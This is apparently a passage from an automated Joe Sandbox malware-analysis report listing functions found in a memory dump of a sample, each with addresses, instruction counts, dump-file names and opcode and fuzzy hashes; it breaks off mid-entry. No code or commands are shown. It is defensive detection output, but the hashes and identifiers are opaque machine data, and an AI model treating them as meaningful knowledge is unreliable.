                                                            Function 00F96A50 Relevance: .5, Instructions: 548COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b23dc2d677d60b19a394bb6b69b4aa4cde331ae9a2b47784ed6475f96ef928ac
                                                            • Instruction ID: 99e732b0f712bc8832e44e65f225d11f8ccef8dabdef703a8963f8d4e75672ef
                                                            • Opcode Fuzzy Hash: b23dc2d677d60b19a394bb6b69b4aa4cde331ae9a2b47784ed6475f96ef928ac
                                                            • Instruction Fuzzy Hash: BC327B71A05209CFDB25CFA8C880BAAB7F1FF88310F24456AE955EB351D734AC45EB50
                                                            Function 00FB4A35 Relevance: .4, Instructions: 423COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                            • Instruction ID: 752de4beb1520615be6f33e60582b6e5c0314c24ef0a882bd6527951c9405fa6
                                                            • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                            • Instruction Fuzzy Hash: 89F16E71E012199BDB14DF96CA80BEEBBB9AF48710F048129E905AB351E774EC42EF50
                                                            Function 0102892B Relevance: .4, Instructions: 386COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4a41c536e1f88403cedb32a1f021629c80dd17a4351d6d91211b5128fe5ed1cb
                                                            • Instruction ID: 3945e1eaea06dc75b779161c4c201d9cb90cbb331274ad0ea7b84780b2429147
                                                            • Opcode Fuzzy Hash: 4a41c536e1f88403cedb32a1f021629c80dd17a4351d6d91211b5128fe5ed1cb
                                                            • Instruction Fuzzy Hash: 4CD1F379E006298BDF15CF58C841AFEB7F1BF88304F18C16AD995A7241EB39E905CB60
                                                            Function 00F965D0 Relevance: .4, Instructions: 383COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b03dbabf3f7773c77804ca8687665384bb64c60601562b8b73ea82dca44ea9e0
                                                            • Instruction ID: f3f0a3ceaa6b4b8e96abb48f2eebb72c039267bb18888fd56ebb1eb93d6946ab
                                                            • Opcode Fuzzy Hash: b03dbabf3f7773c77804ca8687665384bb64c60601562b8b73ea82dca44ea9e0
                                                            • Instruction Fuzzy Hash: 8BE18B71A08341CFDB14CF28C490A6ABBE0BF99318F15896DF999CB351DB31E905DB92
                                                            Function 00F88397 Relevance: .4, Instructions: 380COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d5179f1295d4876af7aa4a2cb1c8cc31a82e1d2fd914dbcd70ed323d6cd9d775
                                                            • Instruction ID: 3d4f5859986eca5281d74316125c6b27c1a1791948ef9f4af99687d1d2c52710
                                                            • Opcode Fuzzy Hash: d5179f1295d4876af7aa4a2cb1c8cc31a82e1d2fd914dbcd70ed323d6cd9d775
                                                            • Instruction Fuzzy Hash: 6BD1CE72A002069BCB14EF65CC81BFF73B5AF54394F544629F816DB281EB38E942EB50
                                                            Function 01018243 Relevance: .3, Instructions: 322COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                            • Instruction ID: 927d46f0e10c620e92071dffafa3fd3c30c03073ecee0eade1c036be8ff5fabc
                                                            • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                            • Instruction Fuzzy Hash: C2B19475A006059FDB65DB94C940EEBBBF9FF84304F14845EEA8297798DB38EA05CB10
                                                            Function 00FA0535 Relevance: .3, Instructions: 300COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                            • Instruction ID: 9f899a9296044fea73f0c991a74b7ca16e88d4fdba51377feec5ab01d7385866
                                                            • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                            • Instruction Fuzzy Hash: 9AB12771A0064AAFDB21DB68C850BBEB7F6AF85310F180169E652D7391DF34ED41EB90
                                                            Function 00F983C0 Relevance: .3, Instructions: 281COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ba3c550e70a12891e9100a0ccddb6de84296348d9358ebd3c4ba172a16086894
                                                            • Instruction ID: e6a39f6d9a932d09c0931d710ca07aea70e826cee10cc215ff7cfb22e8eaf351
                                                            • Opcode Fuzzy Hash: ba3c550e70a12891e9100a0ccddb6de84296348d9358ebd3c4ba172a16086894
                                                            • Instruction Fuzzy Hash: 09C17970608341CFE764CF18C484BABB7E5BF88354F44492DE989872A1DB75E909DF92
                                                            Function 00F8C427 Relevance: .3, Instructions: 280COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 393d19ae6b01ab490919fd5ec468e6f309ea42b3dbea45e8bfd7c5c4b5354299
                                                            • Instruction ID: f9d949da7770a66191fdad8c038b0dcc199be297cc2bc9184c2064e994849ad3
                                                            • Opcode Fuzzy Hash: 393d19ae6b01ab490919fd5ec468e6f309ea42b3dbea45e8bfd7c5c4b5354299
                                                            • Instruction Fuzzy Hash: 5AB18270A002658BDB64DF65C880BE9B3B1EF44710F1485EAE54AEB281EB34ED85DF61
                                                            Function 00FBE5E7 Relevance: .3, Instructions: 278COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2333e3777f33246457bb85df05e5fc866280f57083fbca3d07e82f28b49f10b8
                                                            • Instruction ID: 4340d3c50f8eb2f8784928a459d3dc269bd8b8622da78412714291cfd80c9511
                                                            • Opcode Fuzzy Hash: 2333e3777f33246457bb85df05e5fc866280f57083fbca3d07e82f28b49f10b8
                                                            • Instruction Fuzzy Hash: 66A12632E0022D9FDB21DB99C844BFEBBB5AF01720F150125EA51AB2E0D7789D44EBD1
                                                            Function 00FD0185 Relevance: .3, Instructions: 276COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b2722e0785ba113edcb44a1a6e84a71913ba6323ced81f459644bcc63c64d863
                                                            • Instruction ID: 3359cf7f3a1b4d92ddf88c5d34f5d3c0dbbd8e05a97995c88d31c29cc8c1435b
                                                            • Opcode Fuzzy Hash: b2722e0785ba113edcb44a1a6e84a71913ba6323ced81f459644bcc63c64d863
                                                            • Instruction Fuzzy Hash: C6A1E871B016169BDB25CF65C991BAA77F2FF44314F18402AEA85D7382DF34E811EB50
                                                            Function 01064500 Relevance: .3, Instructions: 275COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a91d5e64bb13997e3a6b375a9a953153e88ae098e68e05d5d398d729ec19aa77
                                                            • Instruction ID: 56d10725c4a24724ed7565a383b36bfb42bd3f0e11e02e547bf3c9af0d0f5a48
                                                            • Opcode Fuzzy Hash: a91d5e64bb13997e3a6b375a9a953153e88ae098e68e05d5d398d729ec19aa77
                                                            • Instruction Fuzzy Hash: E7A1C9B2A04651AFC762DF18CD80B6ABBE9FF49704F050568F589DB652C738E900CB91
                                                            Function 01062B57 Relevance: .3, Instructions: 266COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                            • Instruction ID: b8f400986f124fcbda08f2437912af6135f5dc25c1900704f034addf8846a330
                                                            • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                            • Instruction Fuzzy Hash: DBB16771E0061ADFDF68DFA8C880AADBBF9FF48310F148169E954AB354D730A941CB90
                                                            Function 010160E0 Relevance: .3, Instructions: 264COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6fa4fdce2c5d2d1ea8073865ceaa99c0532bd83ec02a6e835c68183c1013e246
                                                            • Instruction ID: c9f4ee95a0ae38f4e788c1b6b84d568ca668f4f0c2b189ce80f548a3f5b39af4
                                                            • Opcode Fuzzy Hash: 6fa4fdce2c5d2d1ea8073865ceaa99c0532bd83ec02a6e835c68183c1013e246
                                                            • Instruction Fuzzy Hash: 8C91B171D00215AFDB15CFA8DC90BBEBBB5AF48710F144169E690EB345D7BAE9009BA0
                                                            Function 00FAE3F0 Relevance: .3, Instructions: 261COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 79bd2cd51e45fe38b4fc3798880614fef4d039dc58d561132fa8c68593f82720
                                                            • Instruction ID: cf8b6a1f4139449e458d9017f5eab46f17d425dea1438c15b727973ef3f69271
                                                            • Opcode Fuzzy Hash: 79bd2cd51e45fe38b4fc3798880614fef4d039dc58d561132fa8c68593f82720
                                                            • Instruction Fuzzy Hash: 8A9186B6E002158FDB24EB58C840B7EB7A5EF8A724F198069ED40DB390E778DC01EB50
                                                            Function 00FE6ACC Relevance: .2, Instructions: 226COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0c4ca9d4a355a3b3effe141ab6876c4bcabfe4ed62c185f5df61957366af0776
                                                            • Instruction ID: 187bd919769e82157f070637b50dc6be1eb2b5bfcbbd06d6f0b96244086831ae
                                                            • Opcode Fuzzy Hash: 0c4ca9d4a355a3b3effe141ab6876c4bcabfe4ed62c185f5df61957366af0776
                                                            • Instruction Fuzzy Hash: 1681E4B1E002599FDB24CF6AC840ABEBBF9FB58750F14852EE455E7240E734E940DB94
                                                            Function 0105AB40 Relevance: .2, Instructions: 222COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                            • Instruction ID: 1fc952c5ad8faadf0a710fe5fcbb69404a41cd4ce29be367baec4d23c2ab2c38
                                                            • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                            • Instruction Fuzzy Hash: F7815E71B00209DFDF99DF99C880AAFBBF6BF84310B1486A9DD569B345D634E901CB50
                                                            Function 00FCE284 Relevance: .2, Instructions: 212COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 424a000b0a8b8a7d7d3e38bb7243e3ede749c09c205a2e529710747393d4be7e
                                                            • Instruction ID: 7b90ba15822a89e7bf7db801497f17d4586ed6b6ec095edfb9d3ca385532c011
                                                            • Opcode Fuzzy Hash: 424a000b0a8b8a7d7d3e38bb7243e3ede749c09c205a2e529710747393d4be7e
                                                            • Instruction Fuzzy Hash: C1816C71A0060AAFDB25CBA8C981FEEBBFAFF48314F10442DE555A7250D730AD05DB60
                                                            Function 00FAC640 Relevance: .2, Instructions: 206COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c40951eb91ed891f3820643cae86730e813e259ba64995b5f22afef92a8e037e
                                                            • Instruction ID: 3c5e5598c73f772867d6fac2c0d6d4948e1852bddfacf91de6d04734cbe6191d
                                                            • Opcode Fuzzy Hash: c40951eb91ed891f3820643cae86730e813e259ba64995b5f22afef92a8e037e
                                                            • Instruction Fuzzy Hash: B471E1B5C04669DBCB25CF58C8907BEBBB4FF59750F24411AE982AB3A0D7359801EBD0
                                                            Function 010447A0 Relevance: .2, Instructions: 202COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 33ae0a5f2f838a7418ae21636f93bc71f4d0f0c2c9d6f33f5051ed4499d435f3
                                                            • Instruction ID: 5b94d2c662ccfadd44cdcf751719577e24e6e157e064877ee251c99ce039f3e0
                                                            • Opcode Fuzzy Hash: 33ae0a5f2f838a7418ae21636f93bc71f4d0f0c2c9d6f33f5051ed4499d435f3
                                                            • Instruction Fuzzy Hash: 187180B0D04204EFDB20EF59D981B9EBBF9FB81310F0641AAE6C0EB259C7368944DB54
                                                            Function 00FA260B Relevance: .2, Instructions: 201COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fac8acfa9b0e4c632673ce1519df7489283869de82962ef068165e70931141ef
                                                            • Instruction ID: 4ba3f59ffa89abdc4140a9282e154257f6772a4c6e92dc1bf7400764aa46fec9
                                                            • Opcode Fuzzy Hash: fac8acfa9b0e4c632673ce1519df7489283869de82962ef068165e70931141ef
                                                            • Instruction Fuzzy Hash: 8B718AB6B046428FC351DF28C480B6AB7E5FF85320F0485AAE8998B352DB38DD45DB91
                                                            Function 0101035C Relevance: .2, Instructions: 198COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                            • Instruction ID: 0fbcf978a278ea250190681ec8da620bde35533a56dae8b8d2ba82ce26ccd70b
                                                            • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                            • Instruction Fuzzy Hash: FB717D71A00619EFCB10DFA9C984ADEBBF9FF48700F104569F585A7255EB38EA41CB90
                                                            Function 010262A0 Relevance: .2, Instructions: 198COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 77a6e640571c0e555c27001f4541ad38cbd92c3b844289546b96023df87492f6
                                                            • Instruction ID: ed7c7a63fea8941459400d4a0a3698e3f631021d40ecc94e31b537c563d41204
                                                            • Opcode Fuzzy Hash: 77a6e640571c0e555c27001f4541ad38cbd92c3b844289546b96023df87492f6
                                                            • Instruction Fuzzy Hash: 4E710232200B11AFE7329F18CC45F5ABBE6FF44720F148459EAD68B2A1DB76E944DB50
                                                            Function 00F98AA0 Relevance: .2, Instructions: 197COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 21c0d44e2fa1f11fbfaf2dfd43c0c1c3f677b57c6d652373a4931dc1b29bff94
                                                            • Instruction ID: a081d8bc009898e11d4a2cb2be72231c4146901dd642bb46d2b9cf78b71870c7
                                                            • Opcode Fuzzy Hash: 21c0d44e2fa1f11fbfaf2dfd43c0c1c3f677b57c6d652373a4931dc1b29bff94
                                                            • Instruction Fuzzy Hash: 4581A472E0831A8FEB24CF98D484B6D77B1BF89320F15412DD900AB392C7799D41EB90
                                                            Function 01068324 Relevance: .2, Instructions: 192COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a1b63e83755eeb633f299504add9a098410ce2a41a84728b8dae2ed92e3b088b
                                                            • Instruction ID: 9084a633c6f7ae840c2497f7f60b986102aff33946beff16c5dda7a7cf7bda24
                                                            • Opcode Fuzzy Hash: a1b63e83755eeb633f299504add9a098410ce2a41a84728b8dae2ed92e3b088b
                                                            • Instruction Fuzzy Hash: 93710971E10219AFDB16DF94CC81FEEBBB9FB04360F10816AF650A6290D774AA05CB90
                                                            Function 0104A250 Relevance: .2, Instructions: 184COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ceb04424a47bc893918233de4d821cb0f2b15337986059cf2ce2b3fdcc230be1
                                                            • Instruction ID: a51ee3f3939a685fb2056cdcfb5898927cd665b680975d153a12e0bfcc7cb3cc
                                                            • Opcode Fuzzy Hash: ceb04424a47bc893918233de4d821cb0f2b15337986059cf2ce2b3fdcc230be1
                                                            • Instruction Fuzzy Hash: 5F51CEB2644612EFD311DA68C884F5FB7E8EBC9750F004979BA82DB250DB75ED04C7A2
                                                            Function 01038350 Relevance: .2, Instructions: 161COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b1489c5be42816b2ada5294ced157353d0b3ef93a7b41bab687bfcfa0e306f47
                                                            • Instruction ID: c8eccb9e0dcadca9225ee5224d56620f3ef2a842c2170e89712d29e07e5039a8
                                                            • Opcode Fuzzy Hash: b1489c5be42816b2ada5294ced157353d0b3ef93a7b41bab687bfcfa0e306f47
                                                            • Instruction Fuzzy Hash: 1651A070900705AFD721DF5AC880A9BFBFCBF94710F10875EE19657AA1CBB0A545CB90
                                                            Function 00FCE443 Relevance: .2, Instructions: 158COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3eb6572cbfb6a7ab1d22168934310cee214144013281de830a27dcdea5736462
                                                            • Instruction ID: 06274ec16265731f2d4af30e7df43b433dc316f58f465b2b651dd179b8db409a
                                                            • Opcode Fuzzy Hash: 3eb6572cbfb6a7ab1d22168934310cee214144013281de830a27dcdea5736462
                                                            • Instruction Fuzzy Hash: AA515A71600A05AFDB22EF64CE81FAAB3F9FB04754F54046AF58597262D738AA40EB50
                                                            Function 01034180 Relevance: .2, Instructions: 156COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 45e1804484e693d0686d231ce6e7863ab57972d7f54b43c2917972afa8b9f64f
                                                            • Instruction ID: dc81ddd181df16f06a502f7defcd19fc51a75ea1c0244fd71764b1eda42a5e87
                                                            • Opcode Fuzzy Hash: 45e1804484e693d0686d231ce6e7863ab57972d7f54b43c2917972afa8b9f64f
                                                            • Instruction Fuzzy Hash: 6F5146716083029FD754DF29C881A6BBBE9BFC8704F44892EF589CB250EB34D9058B56
                                                            Function 00FB45B1 Relevance: .2, Instructions: 156COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                            • Instruction ID: 12cd575e4d2278cd757881e63aa6fea95d7bca7e3421eb8cf450918bca3ab537
                                                            • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                            • Instruction Fuzzy Hash: A051B071E00219ABCF15DF95C941BFEBBB5AF49750F144069E900AB251EB38EE44DFA0
                                                            Function 0101E9E0 Relevance: .2, Instructions: 154COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                            • Instruction ID: ad322bdf2a389ee4a669db17f34ae7bf765cf7596a27b03fa2b40ec2a8935670
                                                            • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                            • Instruction Fuzzy Hash: 4C51A671D00209AFEF229B94CCC1BAFBBB5BF00324F154665EE5267295D7389E408BA0
                                                            Function 01058B28 Relevance: .2, Instructions: 152COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9d631a23622a3215a12a4285c16e17d90347717c0b8489bdfa3253dac842a0dd
                                                            • Instruction ID: 5232e0fd4cb743ff3ca25661a925d0d9805e29ac5ee3187240fd77cd6b50a6e3
                                                            • Opcode Fuzzy Hash: 9d631a23622a3215a12a4285c16e17d90347717c0b8489bdfa3253dac842a0dd
